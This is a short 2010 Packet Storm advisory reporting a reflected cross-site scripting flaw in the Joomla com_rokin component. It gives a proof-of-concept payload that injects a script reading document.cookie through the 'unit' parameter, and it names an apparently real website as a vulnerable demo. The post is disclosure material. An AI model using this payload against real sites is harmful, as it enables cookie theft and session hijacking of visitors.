Joomla Rokin Cross Site Scripting

2010-08-07T00:00:00
ID PACKETSTORM:92556
Type packetstorm
Reporter Fl0riX
Modified 2010-08-07T00:00:00

Description

                                        
                                            `  
<------------------- header data start ------------------- >  
#############################################################  
Joomla Component Rokin XSS Vulnerability   
#############################################################  
  
# Author : Fl0riX ~ Bug Researchers  
  
# Greez: Sakkure, All My Friends  
  
# Name : Joomla Com_rokin  
  
# Bug Type : Cross Site Scripting  
  
# Infection : Cookieler Çalinabilir  
  
# Demo Vuln :  
http://www.oursweetevents.com.au/index.php?option=com_rokin&Itemid=fl0rix&unit=[XSS]  
  
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.  
#############################################################  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
index.php?option=com_rokin&Itemid=fl0rix&unit="><script>alert(document.cookie)</script>  
  
< -- bug code end of -- >   
`